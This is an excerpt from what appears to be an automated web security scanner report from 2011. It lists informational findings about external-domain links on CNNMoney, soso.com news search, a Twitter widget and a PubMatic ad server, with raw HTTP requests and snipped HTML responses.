<li class="bankrates-mtg"><a href="http://www.bankrate.com/funnel/mortgages/mortgage-results.aspx?pid=p:cnn&market=66&loan=200000.00&prods=170&points=Zero" target="_blank">15 yr fixed mtg, 0 points, Orlando, FL, APR 3.875%</a>
...[SNIP]...
<li class="bankrates-mtg"><a href="http://www.bankrate.com/funnel/mortgages/mortgage-results.aspx?pid=p:cnn&market=66&loan=200000.00&prods=170&points=Zero" target="_blank">15 yr fixed mtg, 0 points, Orlando, FL, APR 4.000%</a>
...[SNIP]...
<li class="bankrates-mtg"><a href="http://www.bankrate.com/funnel/mortgages/mortgage-results.aspx?pid=p:cnn&market=16&loan=200000.00&prods=182&points=Zero" target="_blank">5/1 ARM, 0 points, Houston, TX, APR 3.125%</a>
...[SNIP]...
<li class="bankrates-mtg"><a href="http://www.bankrate.com/funnel/mortgages/mortgage-results.aspx?pid=p:cnn&market=16&loan=200000.00&prods=182&points=Zero" target="_blank">5/1 ARM, 0 points, Houston, TX, APR 3.250%</a>
...[SNIP]...
<li class="bankrates-mtg"><a href="http://www.bankrate.com/funnel/mortgages/mortgage-results.aspx?pid=p:cnn&market=26&loan=418000.00&prods=194&points=Zero" target="_blank">30 yr jumbo, 0 points, Cleveland, OH, APR 5.500%</a>
...[SNIP]...
<li class="bankrates-mma-cd" style="display: none;"><a href="http://www.bankrate.com/funnel/savings/savings-results.aspx?pid=p:cnn&local=true&market=4&prods=33" target="_blank">MMA , Los Angeles, CA, APY 1.09%</a>
...[SNIP]...
<li class="bankrates-mma-cd" style="display: none;"><a href="http://www.bankrate.com/funnel/savings/savings-results.aspx?pid=p:cnn&local=true&market=42&prods=34" target="_blank">$10K MMA , Tampa, FL, APY 1.09%</a>
...[SNIP]...
<li class="bankrates-mma-cd" style="display: none;"><a href="http://www.bankrate.com/funnel/cd-investments/cd-investment-results.aspx?pid=p:cnn&market=2&prods=14" target="_blank">6 month CD, Metro, NY, APY 1.04%</a>
...[SNIP]...
<li class="bankrates-mma-cd" style="display: none;"><a href="http://www.bankrate.com/funnel/cd-investments/cd-investment-results.aspx?pid=p:cnn&market=2&prods=14" target="_blank">6 month CD, Metro, NY, APY 0.50%</a>
...[SNIP]...
<li class="bankrates-mma-cd" style="display: none;"><a href="http://www.bankrate.com/funnel/cd-investments/cd-investment-results.aspx?pid=p:cnn&market=16&prods=15" target="_blank">1 yr CD, Houston, TX, APY 1.27%</a>
...[SNIP]...
<li class="bankrates-mma-cd" style="display: none;"><a href="http://www.bankrate.com/funnel/cd-investments/cd-investment-results.aspx?pid=p:cnn&market=16&prods=15" target="_blank">1 yr CD, Houston, TX, APY 1.01%</a>
...[SNIP]...
<li class="bankrates-mma-cd" style="display: none;"><a href="http://www.bankrate.com/funnel/cd-investments/cd-investment-results.aspx?pid=p:cnn&market=4&prods=19" target="_blank">5 yr CD, Los Angeles, CA, APY 2.50%</a>
...[SNIP]...
<li class="bankrates-mma-cd" style="display: none;"><a href="http://www.bankrate.com/funnel/cd-investments/cd-investment-results.aspx?pid=p:cnn&market=4&prods=19" target="_blank">5 yr CD, Los Angeles, CA, APY 2.39%</a>
...[SNIP]...
<li class="bankrates-homeeq" style="display: none;"><a href="http://www.bankrate.com/funnel/home-equity/home-equity-results.aspx?pid=p:cnn&market=4&fico=Good&prods=438" target="_blank">CA, $30K home equity loan, APR 7.99%</a>
...[SNIP]...
<li class="bankrates-homeeq" style="display: none;"><a href="http://www.bankrate.com/funnel/home-equity/home-equity-results.aspx?pid=p:cnn&market=4&fico=Good&prods=438" target="_blank">CA, $30K home equity loan, APR 8.87%</a>
...[SNIP]...
<li class="bankrates-homeeq" style="display: none;"><a href="http://www.bankrate.com/funnel/home-equity/home-equity-results.aspx?pid=p:cnn&market=18&fico=Good&prods=506" target="_blank">TX, $50K home equity loan , APR 8.87%</a>
...[SNIP]...
<li class="bankrates-homeeq" style="display: none;"><a href="http://www.bankrate.com/funnel/home-equity/home-equity-results.aspx?pid=p:cnn&market=10&fico=Good&prods=457" target="_blank">PA, $75K home equity loan , APR 4.99%</a>
...[SNIP]...
<li class="bankrates-homeeq" style="display: none;"><a href="http://www.bankrate.com/funnel/home-equity/home-equity-results.aspx?pid=p:cnn&market=10&fico=Good&prods=457" target="_blank">PA, $75K home equity loan , APR 6.89%</a>
...[SNIP]...
<li class="bankrates-homeeq" style="display: none;"><a href="http://www.bankrate.com/funnel/home-equity/home-equity-results.aspx?pid=p:cnn&market=2&fico=Good&prods=437" target="_blank">NY, $30K HELOC , APR 5.24%</a>
...[SNIP]...
<li class="bankrates-homeeq" style="display: none;"><a href="http://www.bankrate.com/funnel/home-equity/home-equity-results.aspx?pid=p:cnn&market=2&fico=Good&prods=437" target="_blank">NY, $30K HELOC , APR 5.49%</a>
...[SNIP]...
<li class="bankrates-homeeq" style="display: none;"><a href="http://www.bankrate.com/funnel/home-equity/home-equity-results.aspx?pid=p:cnn&market=22&fico=Good&prods=507" target="_blank">FL, $50K HELOC, APR 5.49%</a>
...[SNIP]...
<li class="bankrates-cc" style="display: none;"><a href="http://www.bankrate.com/funnel/credit-cards/credit-card-results.aspx?pid=p:cnn&classificationuid=2&childcategoryid=109&childcategory=Low%20Interest%20Card&ec_id=" target="_blank">Capital One, APR 11.9% - 19.9% (V)</a>
...[SNIP]...
<li class="bankrates-cc" style="display: none;"><a href="http://www.bankrate.com/funnel/credit-cards/credit-card-results.aspx?pid=p:cnn&classificationuid=3&childcategoryid=110&childcategory=Balance%20Transfer%20Card&ec_id=" target="_blank">Discover Card, APR 11.99%-20.99% (Variable)*</a>
...[SNIP]...
<li class="bankrates-cc" style="display: none;"><a href="http://www.bankrate.com/funnel/credit-cards/credit-card-results.aspx?pid=p:cnn&classificationuid=8&childcategoryid=117&childcategory=Rewards%20Card&ec_id=" target="_blank">Chase, APR 11.99%-22.99% Variable*</a>
...[SNIP]...
<li class="bankrates-cc" style="display: none;"><a href="http://www.bankrate.com/funnel/credit-cards/credit-card-results.aspx?pid=p:cnn&classificationuid=5&childcategoryid=114&childcategory=Cash%20Back%20Card&ec_id=" target="_blank">Discover Card, APR 11.99% - 20.99% (Variable)*</a>
...[SNIP]...
<li class="bankrates-cc" style="display: none;"><a href="http://www.bankrate.com/funnel/credit-cards/credit-card-results.aspx?pid=p:cnn&classificationuid=9&childcategoryid=118&childcategory=Business%20Card&ec_id=" target="_blank">Chase, APR 13.24%-19.24% (Variable)*</a>
...[SNIP]...
<li class="bankrates-cc" style="display: none;"><a href="http://www.bankrate.com/funnel/credit-cards/credit-card-results.aspx?pid=p:cnn&classificationuid=7&childcategoryid=116&childcategory=Gas%20Rewards%20Card&ec_id=" target="_blank">Capital One, APR 12.9% - 20.9% (V)</a>
...[SNIP]...
<li class="bankrates-cc" style="display: none;"><a href="http://www.bankrate.com/funnel/credit-cards/credit-card-results.aspx?pid=p:cnn&classificationuid=13&childcategoryid=837&childcategory=Secured%20Card&ec_id=" target="_blank">Capital One, APR 22.9%(V)</a>
...[SNIP]...
<li class="bankrates-cc" style="display: none;"><a href="http://www.bankrate.com/funnel/credit-cards/credit-card-results.aspx?pid=p:cnn&classificationuid=6&childcategoryid=115&childcategory=Frequent%20Flyer%20Card&ec_id=" target="_blank">Chase, APR 13.24% Variable*</a>
...[SNIP]...
<li class="bankrates-cc" style="display: none;"><a href="http://www.bankrate.com/funnel/credit-cards/credit-card-results.aspx?pid=p:cnn&classificationuid=30&childcategoryid=121&childcategory=PrePaid%20Cards&ec_id=" target="_blank">MetaBank, APR *</a>
...[SNIP]...
<li class="bankrates-cc" style="display: none;"><a href="http://www.bankrate.com/funnel/credit-cards/credit-card-results.aspx?pid=p:cnn&classificationuid=1&childcategoryid=0&childcategory=Featured%20Cards&ec_id=" target="_blank">Discover Card, APR 11.99%-20.99% (Variable)*</a>
...[SNIP]...
</script><img src="http://i.cdn.turner.com/money/.element/img/1.0/misc/1.gif" alt="" id="TargetImageDE" name="TargetImageDE" width="1" height="1" onLoad="getDEAdHeadCookie(this)">
<div id="csiIframe">
...[SNIP]...
<a href="/"><img src="http://i.cdn.turner.com/money/.element/img/5.0/logos/cnnmoney_footer.gif" alt="CNNMoney" width="105" height="22" border="0" title="CNNMoney.com"></a>
...[SNIP]...
<li><a rel="nofollow" target="new" href="http://www.cnnmoneymediakit.com">Advertise with Us</a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.fortunecareeropportunities.com">Career Opportunities</a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.fortuneconferences.com">Conferences</a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.fortunecouncil.com">Business Leader Council</a>
...[SNIP]...
<li id="footer_maglinkF"><a rel="nofollow" href="https://subscription.fortune.com/storefront/subscribe-to-fortune/link/1002982.html">Subscribe to Fortune</a>
...[SNIP]...
<li id="footer_maglinkM"><a rel="nofollow" href="https://subscription.money.com/storefront/subscribe-to-money/link/1003748.html">Subscribe to Money</a>
...[SNIP]...
<li><a rel="nofollow" href="https://subscription.fortune.com/storefront/subscribe-to-fortune/link/1003749.html">Give the Gift of Fortune</a>
...[SNIP]...
<li><a rel="nofollow" href="https://subscription.money.com/storefront/subscribe-to-money/link/1003746.html">Give the Gift of Money</a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.fortunereprints.com">Reprints</a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.timeincnewsgroupcustompub.com/">Special Sections</a>
...[SNIP]...
<li><a target="new" href="http://facebook.com/cnnmoney">Facebook</a>
...[SNIP]...
<li><a target="new" href="http://twitter.com/cnnmoney">Twitter</a>
...[SNIP]...
<li><a target="new" href="http://www.linkedin.com/today/money.cnn.com">LinkedIn</a>
...[SNIP]...
<li><a target="new" href="http://www.youtube.com/CNNMoney">YouTube</a>
...[SNIP]...
<li><a href="http://cnnmoneytech.tumblr.com/">Tumblr</a>
...[SNIP]...
<a href="/services/advertise/adchoices.html"> Ad choices <img src="http://i2.cdn.turner.com/money/.element/img/1.0/services/advertise/adchoiceslogo_footer.png" width="12" height="12" /></a>.

       </div>
   </div>
<script language="JavaScript" src="http://z.cdn.turner.com/money/.element/script/4.0/omniture/jsmd.js?20110803"></script>
...[SNIP]...
</script>

   <script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2435"></script>
   <!--BIZO Page TAG-->
   <img src="http://www.bizographics.com/collect/?fmt=gif&pid=311" width="1" height="1" border="0" alt="">
   <!--/BIZO Page TAG-->
...[SNIP]...
<!-- Start Quantcast Measurement tag -->
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<noscript>
   <a href="http://www.quantcast.com/p-5dyPa639IrgIw" target="_blank"><img src="http://pixel.quantserve.com/pixel/p-5dyPa639IrgIw.gif" style="display: none" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...
<!-- START REVENUE SCIENCE PIXELLING CODE -->
   <script src="http://js.revsci.net/gateway/gw.js?csid=H07710"></script>
...[SNIP]...
</script>


<img src="http://i.cdn.turner.com/money/video/bvp/images/1.gif" alt="" width="0" height="0" border="0" vspace="0" hspace="0" name="OmnitureTrack" id="OmnitureTrack" align="right">
<img src="http://i.cdn.turner.com/money/images/1.gif" alt="" width="0" height="0" border="0" vspace="0" hspace="0" name="cookieCrumb" id="cookieCrumb" align="right">

<script type="text/javascript">
...[SNIP]...
</script>

<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
<script type="text/javascript" src="http://z.cdn.turner.com/money/.e/script/2.0/pkg/cnnmoney.story/1026.js"></script>
...[SNIP]...

13.32. http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /2011/08/15/technology/google_motorola/index.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2 HTTP/1.1
Host: money.cnn.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:30 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Mon, 15 Aug 2011 18:46:00 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 45778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Google to buy Motorola
...[SNIP]...
<meta name="description" content="Google has agreed to buy Motorola Mobility for $12. 5 billion, announced the two companies on Monday."><link rel="image_src" href="http://i2.cdn.turner.com/money/2011/08/15/technology/google_motorola/google-motorola.01.jpg"><link rel="canonical" href="http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm">
...[SNIP]...
<meta property="fb:page_id" content="139321929435426"/>


<link rel="stylesheet" href="http://z.cdn.turner.com/money/.e/ssi/css/2.0/pkg/cnnmoney.story/1414.css" type="text/css" />


<script type="text/javascript" src="http://z.cdn.turner.com/money/.e/script/2.0/pkg/cnnmoney.main/876.js"></script>
<script type="text/javascript" src="http://z.cdn.turner.com/money/.e/script/jquery/1.5.1/jquery.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://i.cdn.turner.com/money/fn_adspaces/cnn_adspaces.js"></script>
...[SNIP]...
<div id="cnnHeader" class="moneyTechNav"><script language="JavaScript" src="http://i.cdn.turner.com/money/.element/ssi/javascript/1.1/cnnhat_section.js"></script>
...[SNIP]...
<a href="/"><img src="http://i2.cdn.turner.com/money/.element/img/5.0/logos/cnnmoney_mainnav.gif" width="218" height="67" alt="CNNMoney" title="CNNMoney" class="img-logo" /></a>
...[SNIP]...
<li id="mm-share-twitter"><a href="http://twitter.com/cnnmoney" target="new"><img src="http://i.cdn.turner.com/money/.element/img/5.0/misc/social_nav_t.gif" height="20" width="20"></a></li>
       <li id="mm-like-facebook"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fcnnmoney&amp;layout=button_count&amp;show_faces=false&amp;width=90&amp;action=like&amp;colorscheme=light&amp;height=27" scrolling="no" frameborder="0" allowTransparency="true"></iframe>
...[SNIP]...
<li><a href="http://cnnmoneytech.tumblr.com/">Tech&nbsp;Tumblr</a>
...[SNIP]...
<span class="twitterName">@<a href="http://twitter.com/CNNmoneytech" target="_blank">CNNMoneyTech</a>
...[SNIP]...
<!-- KEEP --><img src="http://i2.cdn.turner.com/money/2011/08/15/technology/google_motorola/google-motorola.top.jpg" alt="Google has signed a deal to buy Motorola Mobility for $12.5 billion." width="475" height="307" border="0"/><p>
...[SNIP]...
<a href="#TOP"><img src="http://i.cdn.turner.com/money/images/bug.gif" alt="To top of page" border="0" width="7" height="7"></a>
...[SNIP]...
<div class="cnnEyebrow"><a href="http://cnnmoneytech.tumblr.com/">TECH TUMBLR</a>
...[SNIP]...
<div class="cnnHeadline"><a href="http://cnnmoneytech.tumblr.com/post/8951087120/our-new-unit-of-google-m-a-currency">Our new unit of Google M&amp;A currency</a>
...[SNIP]...
<div class="cologo"><a href="http://www.simplyhired.com/?aff_id=13225" target="_blank"><img src="http://i2.cdn.turner.com/money/.element/img/2.0/partners/simplyhired.gif" width="80" height="18" alt="SimplyHired" /></a>
...[SNIP]...
</script><img src="http://i.cdn.turner.com/money/.element/img/1.0/misc/1.gif" alt="" id="TargetImageDE" name="TargetImageDE" width="1" height="1" onLoad="getDEAdHeadCookie(this)">
<div id="csiIframe">
...[SNIP]...
<a href="/"><img src="http://i.cdn.turner.com/money/.element/img/5.0/logos/cnnmoney_footer.gif" alt="CNNMoney" width="105" height="22" border="0" title="CNNMoney.com"></a>
...[SNIP]...
<li><a rel="nofollow" target="new" href="http://www.cnnmoneymediakit.com">Advertise with Us</a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.fortunecareeropportunities.com">Career Opportunities</a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.fortuneconferences.com">Conferences</a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.fortunecouncil.com">Business Leader Council</a>
...[SNIP]...
<li id="footer_maglinkF"><a rel="nofollow" href="https://subscription.fortune.com/storefront/subscribe-to-fortune/link/1002982.html">Subscribe to Fortune</a>
...[SNIP]...
<li id="footer_maglinkM"><a rel="nofollow" href="https://subscription.money.com/storefront/subscribe-to-money/link/1003748.html">Subscribe to Money</a>
...[SNIP]...
<li><a rel="nofollow" href="https://subscription.fortune.com/storefront/subscribe-to-fortune/link/1003749.html">Give the Gift of Fortune</a>
...[SNIP]...
<li><a rel="nofollow" href="https://subscription.money.com/storefront/subscribe-to-money/link/1003746.html">Give the Gift of Money</a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.fortunereprints.com">Reprints</a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.timeincnewsgroupcustompub.com/">Special Sections</a>
...[SNIP]...
<li><a target="new" href="http://facebook.com/cnnmoney">Facebook</a>
...[SNIP]...
<li><a target="new" href="http://twitter.com/cnnmoney">Twitter</a>
...[SNIP]...
<li><a target="new" href="http://www.linkedin.com/today/money.cnn.com">LinkedIn</a>
...[SNIP]...
<li><a target="new" href="http://www.youtube.com/CNNMoney">YouTube</a>
...[SNIP]...
<li><a href="http://cnnmoneytech.tumblr.com/">Tumblr</a>
...[SNIP]...
<a href="/services/advertise/adchoices.html"> Ad choices <img src="http://i2.cdn.turner.com/money/.element/img/1.0/services/advertise/adchoiceslogo_footer.png" width="12" height="12" /></a>.

       </div>
   </div>
<script language="JavaScript" src="http://z.cdn.turner.com/money/.element/script/4.0/omniture/jsmd.js?20110803"></script>
...[SNIP]...
</script>

   <script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2435"></script>
   <!--BIZO Page TAG-->
   <img src="http://www.bizographics.com/collect/?fmt=gif&pid=311" width="1" height="1" border="0" alt="">
   <!--/BIZO Page TAG-->
...[SNIP]...
<!-- Start Quantcast Measurement tag -->
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<noscript>
   <a href="http://www.quantcast.com/p-5dyPa639IrgIw" target="_blank"><img src="http://pixel.quantserve.com/pixel/p-5dyPa639IrgIw.gif" style="display: none" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...
<!-- START REVENUE SCIENCE PIXELLING CODE -->
   <script src="http://js.revsci.net/gateway/gw.js?csid=H07710"></script>
...[SNIP]...
</script>


<img src="http://i.cdn.turner.com/money/video/bvp/images/1.gif" alt="" width="0" height="0" border="0" vspace="0" hspace="0" name="OmnitureTrack" id="OmnitureTrack" align="right">
<img src="http://i.cdn.turner.com/money/images/1.gif" alt="" width="0" height="0" border="0" vspace="0" hspace="0" name="cookieCrumb" id="cookieCrumb" align="right">

<script type="text/javascript">
...[SNIP]...
</script>

<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
<script type="text/javascript" src="http://z.cdn.turner.com/money/.e/script/2.0/pkg/cnnmoney.story/1026.js"></script>
...[SNIP]...

13.33. http://news.soso.com/n.q  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.soso.com
Path:   /n.q

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /n.q?w=xss&pid=n.res.time.m&ty=c&sd=3&st=r HTTP/1.1
Host: news.soso.com
Proxy-Connection: keep-alive
Referer: http://news.soso.com/n.q?cf=web&ch=web.cf.news&pid=web.cf&ie=utf-8&w=xss&sd=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: suid=6067540526; pgv_flv=10.3 r183; ip=0; cookie=0; name=12612374529663113019270038729854; querytext=xss; pid=web.cf; pgv_pvid=9085923014; pgv_info=pgvReferrer=&ssid=s8020529487; __utma=169109310.1703238222.1313432881.1313432881.1313432881.1; __utmb=169109310.1.10.1313432881; __utmc=169109310; __utmz=169109310.1313432881.1.1.utmcsr=soso.com|utmccn=(referral)|utmcmd=referral|utmcct=/q

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 15 Aug 2011 18:35:18 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: max-age=0
Expires: Mon, 15 Aug 2011 18:35:18 GMT
Vary: Accept-Encoding
Content-Length: 24733

<!DOCTYPE HTML>
<html>
   <head>
       <meta http-equiv="content-type" content="text/html; charset=gb2312" />
       <meta http-equiv="X-UA-Compatible" content="IE=7" />
       <title>xss - ........</title>
       <
...[SNIP]...
<h3><a href="http://www.edu-hb.com/Html/201107/31/20110731112720.htm" onclick="send_click_info(this.href);reportQQLog(0,3774302218007984319, 1);pr_get(this.href,'ftx.click.res','1','news');" target="_blank" >....................<em>
...[SNIP]...
<h3><a href="http://www.im286.cn/blogjiaocheng/37598.html" onclick="send_click_info(this.href);reportQQLog(0,515174080331892797, 2);pr_get(this.href,'ftx.click.res','2','news');" target="_blank" >QJblog <em>
...[SNIP]...
<h3><a href="http://netsecurity.51cto.com/art/201107/277571.htm" onclick="send_click_info(this.href);reportQQLog(0,8615720531507505571, 3);pr_get(this.href,'ftx.click.res','3','news');" target="_blank" >Discuz!..............<em>
...[SNIP]...
<div class="pic"><a href="http://netsecurity.51cto.com/art/201107/277571.htm" onclick="reportQQLog(0,8615720531507505571, 3)" target="_blank"><img src="http://image.news.soso.com/a/36/67/57699626312385.jpg" style="width:118px;height:75px;">
...[SNIP]...
<h3><a href="http://sec.chinabyte.com/288/12135288.shtml" onclick="send_click_info(this.href);reportQQLog(0,2787639345721443404, 4);pr_get(this.href,'ftx.click.res','4','news');" target="_blank" >....2011:..........................</a>
...[SNIP]...
<h3><a href="http://tech.hexun.com/2011-08-11/132360564.html" onclick="send_click_info(this.href);reportQQLog(0,8086783997675511557, 5);pr_get(this.href,'ftx.click.res','5','news');" target="_blank" >.......... ......................</a>
...[SNIP]...
<h3><a href="http://roll.sohu.com/20110810/n315949043.shtml" onclick="send_click_info(this.href);reportQQLog(0,14523387688073517538, 6);pr_get(this.href,'ftx.click.res','6','news');" target="_blank" >............13.......... IE........</a>
...[SNIP]...
<h3><a href="http://www.enet.com.cn/article/2011/0801/A20110801893199.shtml" onclick="send_click_info(this.href);reportQQLog(0,15880898032855204055, 7);pr_get(this.href,'ftx.click.res','7','news');" target="_blank" >WEB........................</a>
...[SNIP]...
<h3><a href="http://tech.qq.com/a/20110810/000214.htm" onclick="send_click_info(this.href);reportQQLog(0,14194866895613869542, 8);pr_get(this.href,'ftx.click.res','8','news');" target="_blank" >................8...... IE..............</a>
...[SNIP]...
<h3><a href="http://server.zdnet.com.cn/server/2011/0811/2052048.shtml" onclick="send_click_info(this.href);reportQQLog(0,16037933880757754292, 9);pr_get(this.href,'ftx.click.res','9','news');" target="_blank" >....8......13.......... 6......Windows Server</a>
...[SNIP]...
<h3><a href="http://sec.chinabyte.com/431/12130931.shtml" onclick="send_click_info(this.href);reportQQLog(0,18423672601998636594, 10);pr_get(this.href,'ftx.click.res','10','news');" target="_blank" >..............................</a>
...[SNIP]...
<li>
               ................ <a href="http://url.cn/2xSs3q" target="_blank">http://url.cn/2<em>
...[SNIP]...
</a> .............. 002 .. <a href="http://url.cn/326E6F" target="_blank">http://url.cn/326E6F</a>
...[SNIP]...
<div class="tView" style="">
                   <a target="_blank" class="tImage" href="http://t1.qpic.cn/mblogpic/99babc4234bb32f8439e/2000">........<br><img class="tImgs" src="http://t1.qpic.cn/mblogpic/99babc4234bb32f8439e/160" style="display: none;"></a>
...[SNIP]...
<li>
               .. ..................!!(......................) .. <a href="http://url.cn/2XSs0I" target="_blank">http://url.cn/2<em>
...[SNIP]...
<div class="tView" style="">
                   <a target="_blank" class="tImage" href="http://t1.qpic.cn/mblogpic/afe9ef186de4ce8bd772/2000">........<br><img class="tImgs" src="http://t1.qpic.cn/mblogpic/afe9ef186de4ce8bd772/160" style="display: none;"></a>
...[SNIP]...
<li><a href="http://mail.qq.com/cgi-bin/feed?u=http://vdap.soso.com/rss?w=qq&kd=n&sd=0&nu=20&src=-12" onClick="pr_get(this.href,'n.click.rssqqmail','','news');" target="_blank"><cite class="rss_qqmain">
...[SNIP]...
<li><a href="http://fusion.google.com/add?feedurl=http%3A%2F%2Fvdap.soso.com%2Frss%3Fw%3Dqq%26kd%3Dn%26sd%3D0%26nu%3D20%26src%3D-12" onClick="pr_get(this.href,'n.click.rssgooglereader','','news');" target="_blank"><cite class="rss_google">
...[SNIP]...
<li><a href="http://reader.youdao.com/b.do?url=http%3A%2F%2Fvdap.soso.com%2Frss%3Fw%3Dqq%26kd%3Dn%26sd%3D0%26nu%3D20%26src%3D-12" onClick="pr_get(this.href,'n.click.rssyoudao','','news');" target="_blank"><cite class="rss_yd">
...[SNIP]...
<li><a href="http://www.zhuaxia.com/add_channel.php?url=http%3A%2F%2Fvdap.soso.com%2Frss%3Fw%3Dqq%26kd%3Dn%26sd%3D0%26nu%3D20%26src%3D-12" onClick="pr_get(this.href,'n.click.rsszhuaxia','','news');" target="_blank"><cite class="rss_zx">
...[SNIP]...
<li><a href="http://www.xianguo.com/subscribe.php?url=http%3A%2F%2Fvdap.soso.com%2Frss%3Fw%3Dqq%26kd%3Dn%26sd%3D0%26nu%3D20%26src%3D-12" onClick="pr_get(this.href,'n.click.rssxianguo','','news');" target="_blank"><cite class="rss_xg">
...[SNIP]...
<li><a href="http://support.qq.com/portal/discuss_pdt/455_1.html " target="_blank">......</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pingjs.qq.com/ping.js"></script>
...[SNIP]...

13.34. http://platform.twitter.com/widgets/follow_button.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://platform.twitter.com
Path:   /widgets/follow_button.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /widgets/follow_button.html?screen_name=imdb HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
Referer: http://i.media-imdb.com/images/social/twitter.html?10
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131065639822629958; k=50.23.123.106.1313040227574140; __utma=43838368.1868148660.1313040243.1313040243.1313040243.1; __utmz=43838368.1313040243.1.1.utmcsr=2011.sf.wordcamp.org|utmccn=(referral)|utmcmd=referral|utmcct=/session/plugin-security-showdown/; __utmv=43838368.lang%3A%20en
If-None-Match: "2b8a366cb95d11e84f49c66b336f7e70"
If-Modified-Since: Thu, 04 Aug 2011 21:23:19 GMT

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=1800
Last-Modified: Thu, 04 Aug 2011 21:23:19 GMT
ETag: "2b8a366cb95d11e84f49c66b336f7e70"
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 33424
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
Date: Mon, 15 Aug 2011 18:24:02 GMT
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

<!DOCTYPE html><html><head><title>Twitter For Websites: Follow Button</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><link rel="profile" href="http://microformats.org/profile/hcard"><style type="text/css">
...[SNIP]...

13.35. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25273&siteId=28134&adId=23480&kadwidth=728&kadheight=90&kbgColor=FFFFFF&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.doubleclick.net/adi/amzn.us.house.redirect/;cid=pubmatic728;sz=728x90;click=http://bes-clck.com/c&frameName=http_ad_doubleclick_netadiamzn_us_house_redirect;cid=pubmatic728;sz=728x90;click=http_bes-clck_comckomli_ads_frame12527328134&kltstamp=2011-7-15%2013%3A42%3A31&ranreq=0.3122092674020678&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
